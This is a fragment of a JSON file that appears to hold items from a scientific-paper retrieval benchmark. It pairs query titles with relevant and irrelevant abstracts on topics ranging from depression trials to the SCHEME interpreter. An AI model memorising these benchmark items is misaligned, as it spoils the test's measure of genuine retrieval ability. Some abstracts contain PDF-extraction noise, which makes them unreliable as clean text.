"text": "BACKGROUND\nAlthough clinicians frequently add a second medication to an initial, ineffective antidepressant drug, no randomized controlled trial has compared the efficacy of this approach.\n\n\nMETHODS\nWe randomly assigned 565 adult outpatients who had nonpsychotic major depressive disorder without remission despite a mean of 11.9 weeks of citalopram therapy (mean final dose, 55 mg per day) to receive sustained-release bupropion (at a dose of up to 400 mg per day) as augmentation and 286 to receive buspirone (at a dose of up to 60 mg per day) as augmentation. The primary outcome of remission of symptoms was defined as a score of 7 or less on the 17-item Hamilton Rating Scale for Depression (HRSD-17) at the end of this study; scores were obtained over the telephone by raters blinded to treatment assignment. The 16-item Quick Inventory of Depressive Symptomatology--Self-Report (QIDS-SR-16) was used to determine the secondary outcomes of remission (defined as a score of less than 6 at the end of this study) and response (a reduction in baseline scores of 50 percent or more).\n\n\nRESULTS\nThe sustained-release bupropion group and the buspirone group had similar rates of HRSD-17 remission (29.7 percent and 30.1 percent, respectively), QIDS-SR-16 remission (39.0 percent and 32.9 percent), and QIDS-SR-16 response (31.8 percent and 26.9 percent). Sustained-release bupropion, however, was associated with a greater reduction (from baseline to the end of this study) in QIDS-SR-16 scores than was buspirone (25.3 percent vs. 17.1 percent, P<0.04), a lower QIDS-SR-16 score at the end of this study (8.0 vs. 9.1, P<0.02), and a lower dropout rate due to intolerance (12.5 percent vs. 20.6 percent, P<0.009).\n\n\nCONCLUSIONS\nAugmentation of citalopram with either sustained-release bupropion or buspirone appears to be useful in actual clinical settings. Augmentation with sustained-release bupropion does have certain advantages, including a greater reduction in the number and severity of symptoms and fewer side effects and adverse events. (ClinicalTrials.gov number, NCT00021528.).",
"title": ""
},
{
"docid": "8d6c928b7e4fd415eaee11e0c932cbf1",
"text": "Journal of Location Based Services Publication details, including instructions for authors and subscription information: http://www.informaworld.com/smpp/title~content=t744398445 Applications of location-based services: a selected review Jonathan Raper a; Georg Gartner b; Hassan Karimi c; Chris Rizos d a Information Science, Northampton Square, City University, London, UK b Department of Geoinformation and Cartography, Vienna University of Technology, Erzherzog-Johannplatz 1, Austria c University of Pittsburgh, PA, USA d School of Surverying 2 SIS, University of New South Wales, Sydney, Australia",
"title": ""
},
{
"docid": "e6e34a487a006aa38a98573b34b9c437",
"text": "In this paper, we study the problem of training largescale face identification model with imbalanced training data. This problem naturally exists in many real scenarios including large-scale celebrity recognition, movie actor annotation, etc. Our solution contains two components. First, we build a face feature extraction model, and improve its performance, especially for the persons with very limited training samples, by introducing a regularizer to the cross entropy loss for the multinomial logistic regression (MLR) learning. This regularizer encourages the directions of the face features from the same class to be close to the direction of their corresponding classification weight vector in the logistic regression. Second, we build a multiclass classifier using MLR on top of the learned face feature extraction model. Since the standard MLR has poor generalization capability for the one-shot classes even if these classes have been oversampled, we propose a novel supervision signal called underrepresented-classes promotion loss, which aligns the norms of the weight vectors of the one-shot classes (a.k.a. underrepresented-classes) to those of the normal classes. In addition to the original cross entropy loss, this new loss term effectively promotes the underrepresented classes in the learned model and leads to a remarkable improvement in face recognition performance. We test our solution on the MS-Celeb-1M low-shot learning benchmark task. Our solution recognizes 94.89% of the test images at the precision of 99% for the one-shot classes. To the best of our knowledge, this is the best performance among all the published methods using this benchmark task with the same setup, including all the participants in the recent MS-Celeb-1M challenge at ICCV 2017.",
"title": ""
},
{
"docid": "617382c83d0af103e977edb3b5b2fba1",
"text": "With the rapid development of location-based social networks (LBSNs), spatial item recommendation has become an important mobile application, especially when users travel away from home. However, this type of recommendation is very challenging compared to traditional recommender systems. A user may visit only a limited number of spatial items, leading to a very sparse user-item matrix. This matrix becomes even sparser when the user travels to a distant place, as most of the items visited by a user are usually located within a short distance from the user’s home. Moreover, user interests and behavior patterns may vary dramatically across different time and geographical regions. In light of this, we propose ST-SAGE, a spatial-temporal sparse additive generative model for spatial item recommendation in this article. ST-SAGE considers both personal interests of the users and the preferences of the crowd in the target region at the given time by exploiting both the co-occurrence patterns and content of spatial items. To further alleviate the data-sparsity issue, ST-SAGE exploits the geographical correlation by smoothing the crowd’s preferences over a well-designed spatial index structure called the spatial pyramid. To speed up the training process of ST-SAGE, we implement a parallel version of the model inference algorithm on the GraphLab framework. We conduct extensive experiments; the experimental results clearly demonstrate that ST-SAGE outperforms the state-of-the-art recommender systems in terms of recommendation effectiveness, model training efficiency, and online recommendation efficiency.",
"title": ""
},
{
"docid": "8074ecf8bd73c4add9e01f0b84ed6e70",
"text": "This paper provides a survey on implementing wireless sensor network (WSN) technology on industrial process monitoring and control. First, the existing industrial applications are explored, following with a review of the advantages of adopting WSN technology for industrial control. Then, challenging factors influencing the design and acceptance of WSNs in the process control world are outlined, and the state-of-the-art research efforts and industrial solutions are provided corresponding to each factor. Further research issues for the realization and improvement of wireless sensor network technology on process industry are also mentioned.",
"title": ""
}
] | scidocsrr |
5806ed49e737878c95104e9e3ddde4f6 | Using machine learning techniques to detect metamorphic relations for programs without test oracles | [
{
"docid": "32c5bbc07cba1aac769ee618e000a4a5",
"text": "In this paper we present Jimple, a 3-address intermediate representation that has been designed to simplify analysis and transformation of Java bytecode. We motivate the need for a new intermediate representation by illustrating several difficulties with optimizing the stack-based Java bytecode directly. In general, these difficulties are due to the fact that bytecode instructions affect an expression stack, and thus have implicit uses and definitions of stack locations. We propose Jimple as an alternative representation, in which each statement refers explicitly to the variables it uses. We provide both the definition of Jimple and a complete procedure for translating from Java bytecode to Jimple. This definition and translation have been implemented using Java, and finally we show how this implementation forms the heart of the Sable research projects.",
"title": ""
},
{
"docid": "e31fd6ce6b78a238548e802d21b05590",
"text": "Machine learning techniques have long been used for various purposes in software engineering. This paper provides a brief overview of the state of the art and reports on a number of novel applications I was involved with in the area of software testing. Reflecting on this personal experience, I draw lessons learned and argue that more research should be performed in that direction as machine learning has the potential to significantly help in addressing some of the long-standing software testing problems.",
"title": ""
}
] | [
{
"docid": "0ff727ff06c02d2e371798ad657153c9",
"text": "Most approaches to human attribute and action recognition in still images are based on image representation in which multi-scale local features are pooled across scale into a single, scale-invariant encoding. Both in bag-of-words and the recently popular representations based on convolutional neural networks, local features are computed at multiple scales. However, these multi-scale convolutional features are pooled into a single scale-invariant representation. We argue that entirely scale-invariant image representations are sub-optimal and investigate approaches to scale coding within a bag of deep features framework. Our approach encodes multi-scale information explicitly during the image encoding stage. We propose two strategies to encode multi-scale information explicitly in the final image representation. We validate our two scale coding techniques on five datasets: Willow, PASCAL VOC 2010, PASCAL VOC 2012, Stanford-40 and Human Attributes (HAT-27). On all datasets, the proposed scale coding approaches outperform both the scale-invariant method and the standard deep features of the same network. Further, combining our scale coding approaches with standard deep features leads to consistent improvement over the state of the art.",
"title": ""
},
{
"docid": "bc3018c825e6866a225bc43876f5560e",
"text": "Video co-localization is the task of jointly localizing common objects across videos. Due to the appearance variations both across the videos and within the video, it is a challenging problem to identify and track them without any supervision. In contrast to previous joint frameworks that use bounding box proposals to attack the problem, we propose to leverage co-saliency activated tracklets to address the challenge. To identify the common visual object, we first explore inter-video commonness, intra-video commonness, and motion saliency to generate the co-saliency maps. Object proposals of high objectness and co-saliency scores are tracked across short video intervals to build tracklets. The best tube for a video is obtained through tracklet selection from these intervals based on confidence and smoothness between the adjacent tracklets, with the help of dynamic programming. Experimental results on the benchmark YouTube Object dataset show that the proposed method outperforms state-of-the-art methods.",
"title": ""
},
{
"docid": "d2d79c26082258264265d7b569060a23",
"text": "Online communities are valuable information sources where knowledge is accumulated by interactions between people. Search services provided by online community sites such as forums are often, however, quite poor. To address this, we investigate retrieval techniques that exploit the hierarchical thread structures in community sites. Since these structures are sometimes not explicit or accurately annotated, we use structure discovery techniques. We then make use of thread structures in retrieval experiments. Our results show that using thread structures that have been accurately annotated can lead to significant improvements in retrieval performance compared to strong baselines.",
"title": ""
},
{
"docid": "803b8189288dc07411c4e9e48dcac9b2",
"text": "Machine-to-machine (M2M) communication is becoming an increasingly important part of mobile traffic and thus also a topic of major interest for mobile communication research and telecommunication standardization bodies. M2M communication offers various ubiquitous services and is one of the main enablers of the vision inspired by the Internet of Things (IoT). The concept of mobile M2M communication has emerged due to the wide range, coverage provisioning, high reliability, and decreasing costs of future mobile networks. Nevertheless, M2M communications pose significant challenges to mobile networks, e.g., due to the expected large number of devices with simultaneous access for sending small-sized data, and a diverse application range. This paper provides a detailed survey of M2M communications in the context of mobile networks, and thus focuses on the latest Long-Term Evolution-Advanced (LTE-A) networks. Moreover, the end-to-end network architectures and reference models for M2M communication are presented. Furthermore, a comprehensive survey is given to M2M service requirements, major current standardization efforts, and upcoming M2M-related challenges. In addition, an overview of upcoming M2M services expected in 5G networks is presented. In the end, various mobile M2M applications are discussed followed by open research questions and directions.",
"title": ""
},
{
"docid": "65f487474652d87022da819815e6bced",
"text": "Chinese input is one of the key challenges for Chinese PC users. This paper proposes a statistical approach to Pinyin-based Chinese input. This approach uses a trigram-based language model and a statistically based segmentation. Also, to deal with real input, it also includes a typing model which enables spelling correction in sentence-based Pinyin input, and a spelling model for English which enables modeless Pinyin input.",
"title": ""
},
{
"docid": "aa0bd00ca5240e462e49df3d1bd3487e",
"text": "The choice of the CMOS logic to be used for implementation of a given specification is usually dependent on the optimization and the performance constraints that the finished chip is required to meet. This paper presents a comparative study of CMOS static and dynamic logic. Effect of voltage variation on power and delay of static and dynamic CMOS logic styles studied. The performance of static logic is better than dynamic logic for designing basic logic gates like NAND and NOR. But the dynamic casecode voltage switch logic (CVSL) achieves better performance. 75% lesser power delay product is achieved than that of static CVSL. However, it observed that dynamic logic performance is better for higher fan in and complex logic circuits.",
"title": ""
},
{
"docid": "5214f391d5b152f9809bec1f6f069d21",
"text": "Abstract—Magnetic resonance imaging (MRI) is an important diagnostic imaging technique for the early detection of brain cancer. Brain cancer is one of the most dangerous diseases occurring commonly among human beings. The chances of survival can be increased if the cancer is detected at its early stage. MRI brain image plays a vital role in assisting radiologists to access patients for diagnosis and treatment. Studying of medical image by the Radiologist is not only a tedious and time consuming process but also accuracy depends upon their experience. So, the use of computer aided systems becomes very necessary to overcome these limitations. Even though several automated methods are available, still segmentation of MRI brain image remains as a challenging problem due to its complexity and there is no standard algorithm that can produce satisfactory results. In this review paper, various current methodologies of brain image segmentation using automated algorithms that are accurate and requires little user interaction are reviewed and their advantages, disadvantages are discussed. This review paper guides in combining two or more methods together to produce accurate results.",
"title": ""
},
{
"docid": "afd1bc554857a1857ac4be5ee37cc591",
"text": "0953-5438/$ see front matter 2011 Elsevier B.V. A doi:10.1016/j.intcom.2011.04.007 ⇑ Corresponding author. E-mail addresses: m.cole@rutgers.edu (M.J. Co (J. Gwizdka), changl@eden.rutgers.edu (C. Liu), ralf@b rutgers.edu (N.J. Belkin), xiangminz@gmail.com (X. Zh We report on an investigation into people’s behaviors on information search tasks, specifically the relation between eye movement patterns and task characteristics. We conducted two independent user studies (n = 32 and n = 40), one with journalism tasks and the other with genomics tasks. The tasks were constructed to represent information needs of these two different users groups and to vary in several dimensions according to a task classification scheme. For each participant we classified eye gaze data to construct models of their reading patterns. The reading models were analyzed with respect to the effect of task types and Web page types on reading eye movement patterns. We report on relationships between tasks and individual reading behaviors at the task and page level. Specifically we show that transitions between scanning and reading behavior in eye movement patterns and the amount of text processed may be an implicit indicator of the current task type facets. This may be useful in building user and task models that can be useful in personalization of information systems and so address design demands driven by increasingly complex user actions with information systems. One of the contributions of this research is a new methodology to model information search behavior and investigate information acquisition and cognitive processing in interactive information tasks. 2011 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "511db40bbc4d24ca8d09b5343aa8d91e",
"text": "Increased risk taking may explain the link between bad moods and self-defeating behavior. In Study 1, personal recollections of self-defeating actions implicated bad moods and resultant risky decisions. In Study 2, embarrassment increased the preference for a long-shot (high-risk, high-payoff) lottery over a low-risk, low-payoff one. Anger had a similar effect in Study 3. Study 4 replicated this and showed that the effect could be eliminated by making participants analyze the lotteries rationally, suggesting that bad moods foster risk taking by impairing self-regulation instead of by altering subjective utilities. Studies 5 and 6 showed that the risky tendencies are limited to unpleasant moods accompanied by high arousal; neither sadness nor neutral arousal resulted in destructive risk taking.",
"title": ""
},
{
"docid": "b96a571e57a3121746d841bed4af4dbe",
"text": "The Open Provenance Model is a model of provenance that is designed to meet the following requirements: (1) To allow provenance information to be exchanged between systems, by means of a compatibility layer based on a shared provenance model. (2) To allow developers to build and share tools that operate on such a provenance model. (3) To define provenance in a precise, technology-agnostic manner. (4) To support a digital representation of provenance for any “thing”, whether produced by computer systems or not. (5) To allow multiple levels of description to coexist. (6) To define a core set of rules that identify the valid inferences that can be made on provenance representation. This document contains the specification of the Open Provenance Model (v1.1) resulting from a community effort to achieve inter-operability in the Provenance Challenge series.",
"title": ""
},
{
"docid": "a287e289fcf2d7e56069fabd90227c7a",
"text": "The mixing of audio signals has been at the foundation of audio production since the advent of electrical recording in the 1920’s, yet the mathematical and psychological bases for this activity are relatively under-studied. This paper investigates how the process of mixing music is conducted. We introduce a method of transformation from a “gainspace” to a “mix-space”, using a novel representation of the individual track gains. An experiment is conducted in order to obtain time-series data of mix engineers exploration of this space as they adjust levels within a multitrack session to create their desired mixture. It is observed that, while the exploration of the space is influenced by the initial configuration of track gains, there is agreement between individuals on the appropriate gain settings required to create a balanced mixture. Implications for the design of intelligent music production systems are discussed.",
"title": ""
},
{
"docid": "91365154a173be8be29ef14a3a76b08e",
"text": "Fraud is a criminal practice for illegitimate gain of wealth or tampering information. Fraudulent activities are of critical concern because of their severe impact on organizations, communities as well as individuals. Over the last few years, various techniques from different areas such as data mining, machine learning, and statistics have been proposed to deal with fraudulent activities. Unfortunately, the conventional approaches display several limitations, which were addressed largely by advanced solutions proposed in the advent of Big Data. In this paper, we present fraud analysis approaches in the context of Big Data. Then, we study the approaches rigorously and identify their limits by exploiting Big Data analytics.",
"title": ""
},
{
"docid": "20d754528009ebce458eaa748312b2fe",
"text": "This poster provides a comparative study between Inverse Reinforcement Learning (IRL) and Apprenticeship Learning (AL). IRL and AL are two frameworks, using Markov Decision Processes (MDP), which are used for the imitation learning problem where an agent tries to learn from demonstrations of an expert. In the AL framework, the agent tries to learn the expert policy whereas in the IRL framework, the agent tries to learn a reward which can explain the behavior of the expert. This reward is then optimized to imitate the expert. One can wonder if it is worth estimating such a reward, or if estimating a policy is sufficient. This quite natural question has not really been addressed in the literature right now. We provide partial answers, both from a theoretical and empirical point of view.",
"title": ""
},
{
"docid": "043726d6fb1666f44e05e074382b21ad",
"text": "Context exerts a powerful effect on cognitive performance and is clearly important for language processing, where lexical, sentential, and narrative contexts should differentially engage neural systems that support lexical, compositional, and discourse level semantics. Equally important, but thus far unexplored, is the role of context within narrative, as cognitive demands evolve and brain activity changes dynamically as subjects process different narrative segments. In this study, we used fMRI to examine the impact of context, comparing responses to a single, linguistically matched set of texts when these were differentially presented as random word lists, unconnected sentences and coherent narratives. We found emergent, context-dependent patterns of brain activity in each condition. Perisylvian language areas were always active, consistent with their supporting core linguistic computations. Sentence processing was associated with expanded activation of the frontal operculum and temporal poles. The same stimuli presented as narrative evoked robust responses in extrasylvian areas within both hemispheres, including precuneus, medial prefrontal, and dorsal temporo-parieto-occipital cortices. The right hemisphere was increasingly active as contextual complexity increased, maximal at the narrative level. Furthermore, brain activity was dynamically modulated as subjects processed different narrative segments: left hemisphere activity was more prominent at the onset, and right hemisphere more prominent at the resolution of a story, at which point, it may support a coherent representation of the narrative as a whole. These results underscore the importance of studying language in an ecologically valid context, suggesting a neural model for the processing of discourse.",
"title": ""
},
{
"docid": "79ddf1042ce5b40306e0596851da93a2",
"text": "Introduction: Recently, radiofrequency ablation (RFA) has been increasingly used for the treatment of thyroid nodules. However, immediate morphological changes associated with bipolar devices are poorly shown. Aims: To present the results of analysis of gross and microscopic alterations in human thyroid tissue induced by RFA delivered through the application of the original patented device. Materials and methods: In total, there were 37 surgically removed thyroid glands in females aged 32-67 at presentation: 16 nodules were follicular adenoma (labelled as 'parenchymal' solid benign nodules) and adenomatous colloid goitre was represented by 21 cases. The thyroid gland was routinely processed and the nodules were sliced into two parts - one was a subject for histological routine processing according to the principles that universally apply in surgical pathology, the other one was used for the RFA procedure. Results: No significant difference in size reduction between parenchymal and colloid nodules was revealed (p>0.1, t-test) straight after the treatment. In addition, RFA equally effectively induced necrosis in follicular adenoma and adenomatous colloid goitre (p>0.1, analysis of variance test). As expected, tumour size correlated with size reduction (the smaller the size of the nodule, the greater percentage of the nodule volume that was ablated): r=-0.48 (p<0.0001). Conclusion: The results make it possible to move from ex vivo experiments to clinical practice.",
"title": ""
},
{
"docid": "080e7880623a09494652fd578802c156",
"text": "Whole-cell biosensors are a good alternative to enzyme-based biosensors since they offer the benefits of low cost and improved stability. In recent years, live cells have been employed as biosensors for a wide range of targets. In this review, we will focus on the use of microorganisms that are genetically modified with the desirable outputs in order to improve the biosensor performance. Different methodologies based on genetic/protein engineering and synthetic biology to construct microorganisms with the required signal outputs, sensitivity, and selectivity will be discussed.",
"title": ""
},
{
"docid": "b2be1256b16382e41381cc8373922ea9",
"text": "This paper reviews research that studies the relationship between management control systems (MCS) and business strategy. Empirical research studies that use contingency approaches and case study applications are examin ed focusing on specific aspects of MCS and their relationship with strategy. These aspects include cost control orientation, performance evaluation and reward systems, the effect of resource sharing, the role of MCS in influencing strategic change and the choice of interactive and diagnostic controls. More contemporary approaches to the relationship between performance measurement systems and strategy are also considered. It is concluded that our knowledge of the relationship between MCS and strategy is limited, providing considerable scope for further research. A series of future research questions is presented.@ 1997 Elsevier Science Ltd. All rights reserved In recent years there has been a growing interest in the relationship between management control systems (MCS) and strategy. It has been suggested that the MCS should be tailored explicitly to support the strategy of the business to lead to competitive advantage and superior performance (Dent, 1990; Samson et al., 1991; Simons, 1987a, 1990). Also, there is evidence that high organizational performance may result from a matching of an organization’s environment, strategy and internal structures and systems (Govindarajan & Gupta, 1985; Govindarajan, 198@). Strategy was not used explicitly as a variable in MCS research until the 1980s. This is surprising considering the field of business strategy or business policy has become increasingly important since it emerged in the 1950s (see Chandler, 1962). Much of the empirical research in this area follows a contingency approach and involves a search for systematic relationships between specific elements of the MCS and the particular strategy of the organization (Simons, 1987a; Merchant, 1985b; Govindarajan 81 Gupta, 1985). Case studies have also been undertaken to investigate the role of the MCS in supporting and influencing the strategic processes within organizations (Simons, 1990; Roberts, 1990; Archer & Otley, 1991). The focus has been primarily on business strategy at the senior management level of the organization. However, since the mid198Os, in the operations management literature there has been a growing interest in researching the way that manufacturing strategies can be used to gain competitive advantage (Buffa, 1984; Schonberger, 1986; Hayes et al., 1988). Normative studies and single case studies have explored the relationship between MCS and *This paper has benefited from comments of seminar participants at Lancaster University, University of Adelaide and the University of Tasmania, and participants at the European Accounting Association meeting held in Finland in 1993. I am also grateful for the help provided by Anthony Hopwood and the anonymous referees.",
"title": ""
},
{
"docid": "07575ce75d921d6af72674e1fe563ff7",
"text": "With a growing body of literature linking systems of high-performance work practices to organizational performance outcomes, recent research has pushed for examinations of the underlying mechanisms that enable this connection. In this study, based on a large sample of Welsh public-sector employees, we explored the role of several individual-level attitudinal factors--job satisfaction, organizational commitment, and psychological empowerment--as well as organizational citizenship behaviors that have the potential to provide insights into how human resource systems influence the performance of organizational units. The results support a unit-level path model, such that department-level, high-performance work system utilization is associated with enhanced levels of job satisfaction, organizational commitment, and psychological empowerment. In turn, these attitudinal variables were found to be positively linked to enhanced organizational citizenship behaviors, which are further related to a second-order construct measuring departmental performance.",
"title": ""
},
{
"docid": "3b4622a4ad745fc0ffb3b6268eb969fa",
"text": "Eruptive syringomas: unresponsiveness to oral isotretinoin A 22-year-old man of Egyptian origin was referred to our department due to exacerbation of pruritic pre-existing papular dermatoses. The skin lesions had been present since childhood. The family history was negative for a similar condition. The patient complained of exacerbation of the pruritus during physical activity under a hot climate and had moderate to severe pruritus during his work. Physical examination revealed multiple reddish-brownish smooth-surfaced, symmetrically distributed papules 2–4 mm in diameter on the patient’s trunk, neck, axillae, and limbs (Fig. 1). The rest of the physical examination was unremarkable. The Darier sign was negative. A skin biopsy was obtained from a representative lesion on the trunk. Histopathologic examination revealed a small, wellcircumscribed neoplasm confined to the upper dermis, composed of small solid and ductal structures relatively evenly distributed in a sclerotic collagenous stroma. The solid elements were of various shapes (round, oval, curvilinear, “comma-like,” or “tadpole-like”) (Fig. 2). These microscopic features and the clinical presentation were consistent with the diagnosis of eruptive syringomas. Our patient was treated with a short course of oral antihistamines without any effect and subsequently with low-dose isotretinoin (10 mg/day) for 5 months. No improvement of the skin eruption was observed while cessation of the pruritus was accomplished. Syringoma is a common adnexal tumor with differentiation towards eccrine acrosyringium composed of small solid and ductal elements embedded in a sclerotic stroma and restricted as a rule to the upper to mid dermis, usually presenting clinically as multiple lesions on the lower eyelids and cheeks of adolescent females. A much less common variant is the eruptive or disseminated syringomas, which involve primarily young women. Eruptive syringomas are characterized by rapid development during a short period of time of hundreds of small (1–5 mm), ill-defined, smooth surfaced, skin-colored, pink, yellowish, or brownish papules typically involving the face, trunk, genitalia, pubic area, and extremities but can occur principally in any site where eccrine glands are found. The pathogenesis of eruptive syringoma remains unclear. Some authors have recently challenged the traditional notion that eruptive syringomas are neoplastic lesions. Chandler and Bosenberg presented evidence that eruptive syringomas result from autoimmune destruction of the acrosyringium and proposed the term autoimmune acrosyringitis with ductal cysts. Garrido-Ruiz et al. support the theory that eruptive syringomas may represent a hyperplastic response of the eccrine duct to an inflammatory reaction. In a recent systematic review by Williams and Shinkai the strongest association of syringomas was with Down’s syndrome (183 reported cases, 22.2%). Syringomas are also associated with diabetes mellitus (17 reported cases, 2.1%), Ehlers–Danlos",
"title": ""
},
{
"docid": "4172a0c101756ea8207b65b0dfbbe8ce",
"text": "Inspired by ACTORS [7, 17], we have implemented an interpreter for a LISP-like language, SCHEME, based on the lambda calculus [2], but extended for side effects, multiprocessing, and process synchronization. The purpose of this implementation is tutorial. We wish to: 1. alleviate the confusion caused by Micro-PLANNER, CONNIVER, etc., by clarifying the embedding of non-recursive control structures in a recursive host language like LISP. 2. explain how to use these control structures, independent of such issues as pattern matching and data base manipulation. 3. have a simple concrete experimental domain for certain issues of programming semantics and style. This paper is organized into sections. The first section is a short “reference manual” containing specifications for all the unusual features of SCHEME. Next, we present a sequence of programming examples which illustrate various programming styles, and how to use them. This will raise certain issues of semantics which we will try to clarify with lambda calculus in the third section. In the fourth section we will give a general discussion of the issues facing an implementor of an interpreter for a language based on lambda calculus. Finally, we will present a completely annotated interpreter for SCHEME, written in MacLISP [13], to acquaint programmers with the tricks of the trade of implementing non-recursive control structures in a recursive language like LISP. This report describes research done at the Artificial Intelligence Laboratory of the Massachusetts Institute of Technology. Support for the laboratory’s artificial intelligence research is provided in part by the Advanced Research Projects Agency of the Department of Defense under Office of Naval Research contract N00014-75-C0643. 1. The SCHEME Reference Manual SCHEME is essentially a full-funarg LISP. LAMBDAexpressions need not be QUOTEd, FUNCTIONed, or *FUNCTIONed when passed as arguments or returned as values; they will evaluate to closures of themselves. All LISP functions (i.e.,EXPRs,SUBRs, andLSUBRs, butnotFEXPRs,FSUBRs, orMACROs) are primitive operators in SCHEME, and have the same meaning as they have in LISP. Like LAMBDAexpressions, primitive operators and numbers are self-evaluating (they evaluate to trivial closures of themselves). There are a number of special primitives known as AINTs which are to SCHEME as FSUBRs are to LISP. We will enumerate them here. IF This is the primitive conditional operator. It takes three arguments. If the first evaluates to non-NIL , it evaluates the second expression, and otherwise the third. QUOTE As in LISP, this quotes the argument form so that it will be passed verbatim as data. The abbreviation “ ’FOO” may be used instead of “ (QUOTE FOO) ”. 406 SUSSMAN AND STEELE DEFINE This is analogous to the MacLISP DEFUNprimitive (but note that theLAMBDA must appear explicitly!). It is used for defining a function in the “global environment” permanently, as opposed to LABELS(see below), which is used for temporary definitions in a local environment.DEFINE takes a name and a lambda expression; it closes the lambda expression in the global environment and stores the closure in the LISP value cell of the name (which is a LISP atom). LABELS We have decided not to use the traditional LABEL primitive in this interpreter because it is difficult to define several mutually recursive functions using only LABEL. 
The solution, which Hewitt [17] also uses, is to adopt an ALGOLesque block syntax: (LABELS <function definition list> <expression>) This has the effect of evaluating the expression in an environment where all the functions are defined as specified by the definitions list. Furthermore, the functions are themselves closed in that environment, and not in the outer environment; this allows the functions to call themselvesand each otherecursively. For example, consider a function which counts all the atoms in a list structure recursively to all levels, but which doesn’t count the NIL s which terminate lists (but NIL s in theCARof some list count). In order to perform this we use two mutually recursive functions, one to count the car and one to count the cdr, as follows: (DEFINE COUNT (LAMBDA (L) (LABELS ((COUNTCAR (LAMBDA (L) (IF (ATOM L) 1 (+ (COUNTCAR (CAR L)) (COUNTCDR (CDR L)))))) (COUNTCDR (LAMBDA (L) (IF (ATOM L) (IF (NULL L) 0 1) (+ (COUNTCAR (CAR L)) (COUNTCDR (CDR L))))))) (COUNTCDR L)))) ;Note: COUNTCDR is defined here. ASET This is the side effect primitive. It is analogous to the LISP function SET. For example, to define a cell [17], we may useASETas follows: (DEFINE CONS-CELL (LAMBDA (CONTENTS) (LABELS ((THE-CELL (LAMBDA (MSG) (IF (EQ MSG ’CONTENTS?) CONTENTS (IF (EQ MSG ’CELL?) ’YES (IF (EQ (CAR MSG) ’<-) (BLOCK (ASET ’CONTENTS (CADR MSG)) THE-CELL) (ERROR ’|UNRECOGNIZED MESSAGE CELL| MSG ’WRNG-TYPE-ARG))))))) THE-CELL))) INTERPRETER FOR EXTENDED LAMBDA CALCULUS 407 Those of you who may complain about the lack of ASETQare invited to write(ASET’ foo bar) instead of(ASET ’foo bar) . EVALUATE This is similar to the LISP functionEVAL. It evaluates its argument, and then evaluates the resulting s-expression as SCHEME code. CATCH This is the “escape operator” which gives the user a handle on the control structure of the interpreter. The expression: (CATCH <identifier> <expression>) evaluates<expression> in an environment where <identifier> is bound to a continuation which is “just about to return from the CATCH”; that is, if the continuation is called as a function of one argument, then control proceeds as if the CATCHexpression had returned with the supplied (evaluated) argument as its value. For example, consider the following obscure definition of SQRT(Sussman’s favorite style/Steele’s least favorite): (DEFINE SQRT (LAMBDA (X EPSILON) ((LAMBDA (ANS LOOPTAG) (CATCH RETURNTAG (PROGN (ASET ’LOOPTAG (CATCH M M)) ;CREATE PROG TAG (IF (< (ABS (-$ (*$ ANS ANS) X)) EPSILON) (RETURNTAG ANS) ;RETURN NIL) ;JFCL (ASET ’ANS (//$ (+$ (//$ X ANS) ANS) 2.0)) (LOOPTAG LOOPTAG)))) ;GOTO 1.0 NIL))) Anyone who doesn’t understand how this manages to work probably should not attempt to useCATCH. As another example, we can define a THROWfunction, which may then be used with CATCHmuch as they are in LISP: (DEFINE THROW (LAMBDA (TAG RESULT) (TAG RESULT))) CREATE!PROCESS This is the process generator for multiprocessing. It takes one argument, an expression to be evaluated in the current environment as a separate parallel process. If the expression ever returns a value, the process automatically terminates. The value ofCREATE!PROCESSis a process id for the newly generated process. Note that the newly created process will not actually run until it is explicitly started. START!PROCESS This takes one argument, a process id, and starts up that process. It then runs. 408 SUSSMAN AND STEELE STOP!PROCESS This also takes a process id, but stops the process. 
The stopped process may be continued from where it was stopped by using START!PROCESSagain on it. The magic global variable**PROCESS** always contains the process id of the currently running process; thus a process can stop itself by doing (STOP!PROCESS **PROCESS**) . A stopped process is garbage collected if no live process has a pointer to its process id. EVALUATE!UNINTERRUPTIBLY This is the synchronization primitive. It evaluates an expression uninterruptibly; i.e., no other process may run until the expression has returned a value. Note that if a funarg is returned from the scope of an EVALUATE!UNINTERRUPTIBLY, then that funarg will be uninterruptible when it is applied; that is, the uninterruptibility property follows the rules of variable scoping. For example, consider the following function: (DEFINE SEMGEN (LAMBDA (SEMVAL) (LIST (LAMBDA () (EVALUATE!UNINTERRUPTIBLY (ASET’ SEMVAL (+ SEMVAL 1)))) (LABELS (P (LAMBDA () (EVALUATE!UNINTERRUPTIBLY (IF (PLUSP SEMVAL) (ASET’ SEMVAL (SEMVAL 1)) (P))))) P)))) This returns a pair of functions which are V and P operations on a newly created semaphore. The argument to SEMGENis the initial value for the semaphore. Note that P busy-waits by iterating if necessary; because EVALUATE!UNINTERRUPTIBLYuses variable-scoping rules, other processes have a chance to get in at the beginning of each iteration. This busy-wait can be made much more efficient by replacing the expression (P) in the definition ofP with ((LAMBDA (ME) (BLOCK (START!PROCESS (CREATE!PROCESS ’(START!PROCESS ME))) (STOP!PROCESS ME) (P))) **PROCESS**) Let’s see you figure this one out! Note that a STOP!PROCESSwithin anEVALUATE! UNINTERRUPTIBLYforces the process to be swapped out even if it is the current one, and so other processes get to run; but as soon as it gets swapped in again, others are locked out as before. Besides theAINTs, SCHEME has a class of primitives known as AMACRO s These are similar to MacLISPMACROs, in that they are expanded into equivalent code before being executed. Some AMACRO s supplied with the SCHEME interpreter: INTERPRETER FOR EXTENDED LAMBDA CALCULUS 409 COND This is like the MacLISPCONDstatement, except that singleton clauses (where the result of the predicate is the returned value) are not allowed. AND, OR These are also as in MacLISP. BLOCK This is like the MacLISPPROGN, but arranges to evaluate its last argument without an extra net control frame (explained later), so that the last argument may involved in an iteration. Note that in SCHEME, unlike MacLISP, the body of a LAMBDAexpression is not an implicit PROGN. DO This is like the MacLISP “new-style” DO; old-styleDOis not supported. AMAPCAR , AMAPLIST These are likeMAPCARandMAPLIST, but they expect a SCHEME lambda closure for the first argument. To use SCHEME, simply incant at DDT (on MIT-AI): 3",
"title": ""
}
] | scidocsrr |
595ce8deaac1b99be434b97d8861b6e2 | CDTS: Collaborative Detection, Tracking, and Segmentation for Online Multiple Object Segmentation in Videos | [
{
"docid": "4997de0d1663a8362fb47abcf9e34df9",
